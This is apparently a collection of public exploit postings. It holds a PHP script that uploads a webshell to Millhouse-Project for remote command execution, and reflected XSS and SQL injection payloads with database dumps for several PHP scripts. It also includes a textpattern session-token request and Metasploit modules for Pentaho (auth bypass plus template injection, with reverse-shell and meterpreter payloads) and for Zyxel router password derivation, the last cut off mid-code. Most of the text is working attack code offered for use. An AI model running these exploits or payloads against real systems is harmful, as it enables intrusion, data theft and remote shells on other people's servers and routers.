<pre><code><?php<br />/*<br />Exploit Title: thrsrossi Millhouse-Project 1.414 - register - Reflected xss<br />Date: 12/05/2023<br />Exploit Author: Chokri Hammedi<br />Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project<br />Software Link: https://github.com/thrsrossi/Millhouse-Project.git<br />Version: 1.414<br />Tested on: Debian<br />CVE: N/A<br />*/<br />?><br /><br />POC:<br /><br />http://target/views/register.php?error=%3Cscript%3Ealert(%27rose1337%27)%3C/script%3E<br /></code></pre>
<pre><code><?php<br />/*<br />Exploit Title: thrsrossi Millhouse-Project 1.414 Remote Code Execution<br />Date: 12/05/2023<br />Exploit Author: Chokri Hammedi<br />Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project<br />Software Link: https://github.com/thrsrossi/Millhouse-Project.git<br />Version: 1.414<br />Tested on: Debian<br />CVE: N/A<br />*/<br /><br /><br />$options = getopt('u:c:');<br /><br />if(!isset($options['u'], $options['c']))<br />die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi<br />\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n<br />\033[0m\n<br />\n");<br /><br />$target = $options['u'];<br /><br />$command = $options['c'];<br /><br />$url = $target . '/includes/add_post_sql.php';<br /><br /><br />$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8<br />Content-Disposition: form-data; name="title"<br /><br />helloworld<br />------WebKitFormBoundaryzlHN0BEvvaJsDgh8<br />Content-Disposition: form-data; name="description"<br /><br /><p>sdsdsds</p><br />------WebKitFormBoundaryzlHN0BEvvaJsDgh8<br />Content-Disposition: form-data; name="files"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundaryzlHN0BEvvaJsDgh8<br />Content-Disposition: form-data; name="category"<br /><br />1<br />------WebKitFormBoundaryzlHN0BEvvaJsDgh8<br />Content-Disposition: form-data; name="image"; filename="rose.php"<br />Content-Type: application/x-php<br /><br /><?php<br />$shell = shell_exec("' . $command . '");<br />echo $shell;<br />?><br /><br />------WebKitFormBoundaryzlHN0BEvvaJsDgh8--<br />';<br /><br />$headers = array(<br /> 'Content-Type: multipart/form-data;<br />boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',<br /> 'Cookie: PHPSESSID=rose1337',<br />);<br /><br />$ch = curl_init($url);<br />curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);<br />curl_setopt($ch, CURLOPT_URL, $url);<br />curl_setopt($ch, CURLOPT_POSTFIELDS, $post);<br />curl_setopt($ch, CURLOPT_POST, true);<br />curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br />curl_setopt($ch, CURLOPT_HEADER, true);<br /><br />$response = curl_exec($ch);<br />curl_close($ch);<br /><br />// execute command<br /><br />$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);<br />$ch = curl_init($shell);<br />curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br />$exec_shell = curl_exec($ch);<br />curl_close($ch);<br />echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";<br /><br />?><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : codesler.com │<br />│ Vendor : Codesler - Rohit Chouhan (codester.com) │<br />│ Software : HouseKit 1.0 - Rent Property Booking PHP Script │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /flat_details.php<br /><br />GET parameter 'id' is vulnerable to RXSS<br /><br />https://website/flat_details.php?id=22&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E<br /><br /><br />Path: /flats.php<br /><br />GET parameter 's' is vulnerable to RXSS<br /><br />https://website/flats.php?tab=on&s=Hyderabadi3phy%3cscript%3ealert(1)%3c%2fscript%3ezx0nx<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : codesler.com │<br />│ Vendor : Codesler - Rohit Chouhan (codester.com) │<br />│ Software : HouseKit 1.0 - Rent Property Booking PHP Script │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /flat_details.php<br /><br />GET parameter 'id' is vulnerable to SQL Injection<br /><br />https://website/flat_details.php?id=[SQLI]<br /><br />---<br />Parameter: id (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=22 AND (SELECT 2116 FROM (SELECT(SLEEP(5)))vxMc)<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 8 columns<br /> Payload: id=-4049 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b706271,0x4175424a73725a4b6b757359756765517a78784a6b50706b464f474978545652546a4a496c505841,0x716b6a6271),NULL,NULL,NULL-- -<br />---<br /><br /><br />Path: /flats.php<br /><br />GET parameter 's' is vulnerable to SQL Injection<br /><br />https://website/flats.php?tab=on&s=[SQLI]<br /><br />---<br />Parameter: s (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: tab=on&s=Hyderabad' AND (SELECT 5046 FROM (SELECT(SLEEP(5)))BKYF) AND 'ReOi'='ReOi<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 8 columns<br /> Payload: tab=on&s=Hyderabad' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170706a71,0x6e536b46764c48414b6663545a4f78576a56794c74766e5351494f624c786261797255684d5a6d6d,0x716a767071),NULL,NULL,NULL-- -<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching current database<br /><br />current database: '**40*26_housekit'<br /><br /><br />fetching tables<br /><br />+--------------+<br />| admin |<br />| flats |<br />| kyc |<br />| owner |<br />| review |<br />| settings |<br />| transactions |<br />| users |<br />| wallet |<br />| withdraw |<br />+--------------+<br /><br /><br />fetching columns for table 'admin'<br /><br />+----------+---------+<br />| Column | Type |<br />+----------+---------+<br />| id | int(11) |<br />| password | text |<br />| username | text |<br />+----------+---------+<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Pentaho Business Server Auth Bypass and Server Side Template Injection RCE',<br /> 'Description' => %q{<br /> Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x is<br /> vulnerable to an authentication bypass (CVE-2022-43939) and a Server Side Template Injection (SSTI) vulnerability<br /> (CVE-2022-43769) that can be chained together to achieve unauthenticated code execution as the user<br /> running the Pentaho Business Analytics Server.<br /><br /> The first vulnerability (CVE-2022-43939) is an authentication bypass which stems from a regex that allows any<br /> URL that ends in "/", followed by "require", optionally "-js" or "-cfg", any character, and then the string<br /> "js" followed optionally by "?" and then any characters of the attacker's choice.<br /><br /> The second (CVE-2022-43769) is a server side<br /> template injection. This vulnerability allows RCE by making a GET request to /api/ldap/config/ldapTreeNodeChildren and<br /> setting the url parameter to ThymeLeaf template code. By abusing the ability to execute arbitrary Java classes within<br /> Thymeleaf templates, an attacker can execute arbitrary commands as the user running the Pentaho Business Analytics Server.<br /> },<br /> 'Author' => [<br /> 'Harry Withington', # Discovery<br /> 'dwbzn', # PoC<br /> 'jheysel-r7' # Module<br /> ],<br /> 'References' => [<br /> ['URL', 'https://github.com/dwbzn/pentaho-exploits/blob/main/cve-2022-43769.py'], # POC<br /> ['URL', 'https://research.aurainfosec.io/pentest/pentah0wnage/'], # Original writeup<br /> ['URL', 'https://support.pentaho.com/hc/en-us/articles/14455561548301'], # Advisory<br /> ['CVE', '2022-43769'], # RCE<br /> ['CVE', '2022-43939'] # Auth Bypass<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Privileged' => false,<br /> 'Platform' => ['win', 'unix'],<br /> 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_openssl'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => :curl,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x86/meterpreter_reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Windows Command',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :win_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Windows Dropper',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :win_dropper,<br /> 'CmdStagerFlavor' => :certutil,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'<br /> }<br /> }<br /> ],<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2023-04-04',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],<br /> 'Reliability' => [ REPEATABLE_SESSION ]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> Opt::RPORT(8080),<br /> OptString.new('TARGETURI', [true, 'Base path', '/pentaho'])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> # This check method abuses the authentication bypass vulnerability CVE-2022-43939 to check exploitability. Due to a<br /> # bad regex in applicationContext-spring-security.xml endpoints that should not be accessible without authentication<br /> # are made accessible if the URL ends in "/", followed by "require", optionally "-js" or "-cfg", any character,<br /> # and then the string "js" followed optionally by "?" and then any characters of the attacker's choice.<br /><br /> post_require_mixup = ['-cfg', '-js', ''].sample<br /> period_mixup = ['.', Rex::Text.rand_text_alphanumeric(1)].sample<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'api', 'ldap', 'config', 'ldapTreeNodeChildren', "require#{post_require_mixup}#{period_mixup}js")<br /> )<br /><br /> return Exploit::CheckCode::Unknown unless res<br /><br /> if res.code == 200 && res.body == '{}'<br /> Exploit::CheckCode::Appears<br /> else<br /> Exploit::CheckCode::Safe<br /> end<br /> end<br /><br /> def win_target?<br /> target.platform.names.include?('Windows')<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> java_payload = <<~JAVA.gsub(/^\s+/, '').tr("\n", '')<br /> {T(java.lang.Runtime).getRuntime().exec(<br /> new String[]{ #{win_target? ? '"cmd.exe", "/c", ' : '"/bin/sh", "-c", '}'#{cmd.gsub("'", "''")}'}<br /> )<br /> }<br /> JAVA<br /><br /> post_require_mixup = ['-cfg', '-js', ''].sample<br /> period_mixup = ['.', Rex::Text.rand_text_alphanumeric(1)].sample<br /><br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'api', 'ldap', 'config', 'ldapTreeNodeChildren', "require#{post_require_mixup}#{period_mixup}js"),<br /> 'vars_get' => {<br /> 'url' => "##{java_payload}",<br /> 'mgrDn' => Rex::Text.rand_text_alphanumeric(1..24),<br /> 'pwd' => Rex::Text.rand_text_alphanumeric(1..24)<br /> },<br /> 'uri_encode_mode' => 'hex-all' # Needed to encode \ as %5C so we don't run into bad character issues that cause failure on server.<br /> )<br /><br /> unless res<br /> fail_with(Failure::UnexpectedReply, 'No response from the server when attempting to exploit')<br /> end<br /><br /> unless res.code == 200<br /> fail_with(Failure::UnexpectedReply, "Unexpected response code:#{res.code}, when attempting to exploit")<br /> end<br /><br /> unless res.body == 'false'<br /> fail_with(Failure::UnexpectedReply, "The response body from the exploit attempt indicates the attempt was<br /> unsuccessful. The response body should only contain 'false'. The response body<br /> returned was: '#{res.body}'")<br /> end<br /> end<br /><br /> def exploit<br /> print_status('Attempting to exploit...')<br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager<br /> when :win_cmd<br /> execute_command(payload.encoded)<br /> when :win_dropper<br /> execute_cmdstager<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : codesler.com │<br />│ Vendor : Codesler - Rohit Chouhan (codester.com) │<br />│ Software : GaanaGawaana 1.0 - Music Platform PHP Script │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /search<br /><br />https://website/search?q=[SQLI]<br /><br />GET parameter 'q' is vulnerable to SQL Injection<br /><br />---<br />Parameter: q (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: q=' AND (SELECT 3838 FROM (SELECT(SLEEP(5)))giXs) AND 'YaMa'='YaMa<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 12 columns<br /> Payload: q=' UNION ALL SELECT NULL,CONCAT(0x716b707671,0x436e596a66675a65667a6c6a574e675142484f46776b4265766847466958456f6f556c4d58465172,0x716a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching current database<br /><br />current database: '***01*6_gaanagawaana'<br /><br /><br />fetching tables<br /><br />+----------+<br />| settings |<br />| songs |<br />+----------+<br /><br /><br />fetching columns for table 'settings'<br /><br />+-----------+--------------+<br />| Column | Type |<br />+-----------+--------------+<br />| api_key | varchar(200) |<br />| email | varchar(50) |<br />| id | int(11) |<br />| password | varchar(200) |<br />| site_name | longtext |<br />| thumbnail | longtext |<br />| username | varchar(200) |<br />+-----------+--------------+<br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : codesler.com │<br />│ Vendor : Codesler - Rohit Chouhan (codester.com) │<br />│ Software : GaanaGawaana 1.0 - Music Platform PHP Script │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /search<br /><br />GET parameter 'q' is vulnerable to RXSS<br /><br />https://website/search?q=no8pa"><script>alert(1)</script>xb7qk<br /><br />[-] Done<br /></code></pre>
<pre><code>## Title: textpattern-4.8.8 Session token in URL Vulnerability<br />## Author: nu11secur1ty<br />## Date: 05.10.2023<br />## Vendor: https://textpattern.com/<br />## Software: https://github.com/textpattern/textpattern/releases/tag/4.8.8<br />## Reference: https://portswigger.net/kb/issues/00500700_session-token-in-url,<br />https://cwe.mitre.org/data/definitions/200.html<br /><br />## Description:<br />Sensitive information within URLs may be logged in various locations,<br />including the user's browser, the web server, and any forward or<br />reverse proxy servers between the two endpoints. URLs may also be<br />displayed on-screen, bookmarked or emailed around by users. They may<br />be disclosed to third parties via the Referer header when any off-site<br />links are followed. Placing session tokens into the URL increases the<br />risk that they will be captured by an attacker.<br />Issue detail: The URL in the request appears to contain a session<br />token within the query<br />string:http://pwnedhost7.com/textpattern-4.8.8/textpattern/index.php?logout=1&lang=en&_txp_token=64f17b3d874e3c5f9c728f03e1271c64<br /><br />STATUS: Medium Vulnerability<br /><br />[+]Exploit:<br />```GET<br />GET /textpattern-4.8.8/textpattern/index.php?event=diag HTTP/1.1<br />Host: pwnedhost7.com<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138<br />Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: txp_login=Admin%2C628717737574e8be05624bb2da74fb38;<br />txp_login_public=d5f8d91942Admin<br />Connection: close<br /><br />```<br />[+]Response:<br />```HTTP<br />HTTP/1.1 200 OK<br />Date: Wed, 10 May 2023 07:51:37 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30<br />X-Powered-By: PHP/7.4.30<br />Content-Security-Policy: frame-ancestors 'self'<br />X-Frame-Options: SAMEORIGIN<br />Connection: close<br />Content-Type: text/html; charset=utf-8<br />Content-Length: 10725<br /><br /><!DOCTYPE html><br /><html lang="en" dir="ltr"><br /><head><br /><meta charset="utf-8"><br /><meta name="robots" content="noindex, nofollow"><br /><title>Diagnostics - My site | Textpattern CMS</title><br /><script src="vendo<br />...[SNIP]...<br /><input name="event" type="hidden" value="diag" /><a rel="external<br />noopener" target="_blank"<br />href="?event=diag&step=phpinfo&_txp_token=64f17b3d874e3c5f9c728f03e1271c64">PHP<br />configuration <span class="ui-icon ui-icon-extlink"><br />```<br /><br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/textpattern/2023/textpattern-4.8.8)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/05/textpattern-488-session-token-in-url.html)<br /><br />## Time spend:<br />01:15:00<br /><br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'socket'<br />require 'digest/md5'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::SSH<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> attr_accessor :ssh_socket<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Zyxel chained RCE using LFI and weak password derivation algorithm',<br /> 'Description' => %q{<br /> This module exploits multiple vulnerabilities in the `zhttpd` binary (/bin/zhttpd)<br /> and `zcmd` binary (/bin/zcmd). It is present on more than 40 Zyxel routers and CPE devices.<br /> The remote code execution vulnerability can be exploited by chaining the local file disclosure<br /> vulnerability in the zhttpd binary that allows an unauthenticated attacker to read the entire configuration<br /> of the router via the vulnerable endpoint `/Export_Log?/data/zcfg_config.json`.<br /> With this information disclosure, the attacker can determine if the router is reachable via ssh<br /> and use the second vulnerability in the `zcmd` binary to derive the `supervisor` password exploiting<br /> a weak implementation of a password derivation algorithm using the device serial number.<br /><br /> After exploitation, an attacker will be able to execute any command as user `supervisor`.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Author of exploit chain and MSF module contributor<br /> 'SEC Consult Vulnerability Lab',<br /> 'Thomas Rinsma',<br /> 'Bogi Napoleon Wennerstrøm'<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-28770'],<br /> ['URL', 'https://r.sec-consult.com/zyxsploit'],<br /> ['URL', 'https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-multiple-zyxel-devices/'],<br /> ['URL', 'https://th0mas.nl/2020/03/26/getting-root-on-a-zyxel-vmg8825-t50-router/'],<br /> ['URL', 'https://github.com/boginw/zyxel-vmg8825-keygen'],<br /> ['URL', 'https://attackerkb.com/topics/tPAvkwQgDK/cve-2023-28770']<br /> ],<br /> 'DisclosureDate' => '2022-02-01',<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_MIPSBE],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_netcat'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_MIPSBE],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => ['printf', 'echo', 'bourne', 'wget', 'curl'],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/mipsbe/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Interactive SSH',<br /> {<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'generic/ssh/interact'<br /> },<br /> 'Payload' => {<br /> 'Compat' => {<br /> 'PayloadType' => 'ssh_interact'<br /> }<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 80,<br /> 'SSL' => false,<br /> 'SSH_TIMEOUT' => 30,<br /> 'WfsDelay' => 5<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> OptBool.new('STORE_CRED', [false, 'Store credentials into the database.', true])<br /> ]<br /> )<br /> register_advanced_options(<br /> [<br /> OptInt.new('ConnectTimeout', [ true, 'Maximum number of seconds to establish a TCP connection', 10])<br /> ]<br /> )<br /> end<br /><br /> # supervisor user password derivation functions (SerialNumMethod2 and 3) for Zyxel routers<br /> # based on the reverse engineer analysis of Thomas Rinsma and Bogi Napoleon Wennerstrøm<br /> # https://github.com/boginw/zyxel-vmg8825-keygen<br /><br /> def double_hash(input, size = 8)<br /> # ROUND 1<br /> # take the MD5 hash from the serial number SXXXXXXXXXXXX<br /> # this returns a hash of 32 char bytes.<br /> # read md5 hash per two char bytes, check if first char byte = '0', then make first byte char == second byte char<br /> # store two char bytes in round1 and continue with next two char bytes from the hash.<br /> md5_str_array = Digest::MD5.hexdigest(input).split(//)<br /> round1_str_array = Array.new(32)<br /> j = 0<br /> until j == 32<br /> if md5_str_array[j] == '0'<br /> round1_str_array[j] = md5_str_array[j + 1]<br /> else<br /> round1_str_array[j] = md5_str_array[j]<br /> end<br /> round1_str_array[j + 1] = md5_str_array[j + 1]<br /> j += 2<br /> end<br /> round1 = round1_str_array.join<br /> # ROUND 2<br /> # take the MD5 hash from the result of round1<br /> # returns a hash of 32 char bytes.<br /> # read md5 hash per two char bytes, check if first char byte = '0', then make first byte char == second byte char<br /> # store two char bytes in round2 and continue with next two char bytes.<br /> md5_str_array = Digest::MD5.hexdigest(round1).split(//)<br /> round2_str_array = Array.new(32)<br /> j = 0<br /> until j == 32<br /> if md5_str_array[j] == '0'<br /> round2_str_array[j] = md5_str_array[j + 1]<br /> else<br /> round2_str_array[j] = md5_str_array[j]<br /> end<br /> round2_str_array[j + 1] = md5_str_array[j + 1]<br /> j += 2<br /> end<br /> # ROUND 3<br /> # take the result of round2 and pick the number (size) of char bytes starting with indice [0] and increased by 3<br /> # to create the final password hash with defined number (size) of alphanumeric characters and return the final result<br /> round3_str_array = Array.new(size)<br /> for i in 0..(size - 1) do<br /> round3_str_array[i] = round2_str_array[i * 3]<br /> end<br /> round3 = round3_str_array.join<br /> return round3<br /> end<br /><br /> def mod3_key_generator(seed)<br /> # key generator function used in the SerialNumMethod3 pasword derivation function<br /> round4_array = Array.new(16, 0)<br /> found0s = 0<br /> found1s = 0<br /> found2s = 0<br /><br /> while (found0s == 0) || (found1s == 0) || (found2s == 0)<br /> found0s = 0<br /> found1s = 0<br /> found2s = 0<br /><br /> power_of_2 = 1<br /> seed += 1<br /><br /> for i in 0..9 do<br /> round4_array[i] = (seed % (power_of_2 * 3) / power_of_2).floor<br /> if (round4_array[i] == 1)<br /> found1s += 1<br /> elsif (round4_array[i]) == 2<br /> found2s += 1<br /> else<br /> found0s += 1<br /> end<br /> power_of_2 = power_of_2 << 1<br /> end<br /> end<br /> return seed, round4_array<br /> end<br /><br /> def serial_num_method2(serial_number)<br /> # SerialNumMethod2 password derivation function<br /> pwd = double_hash(serial_number)<br /> return pwd<br /> end<br /><br /> def 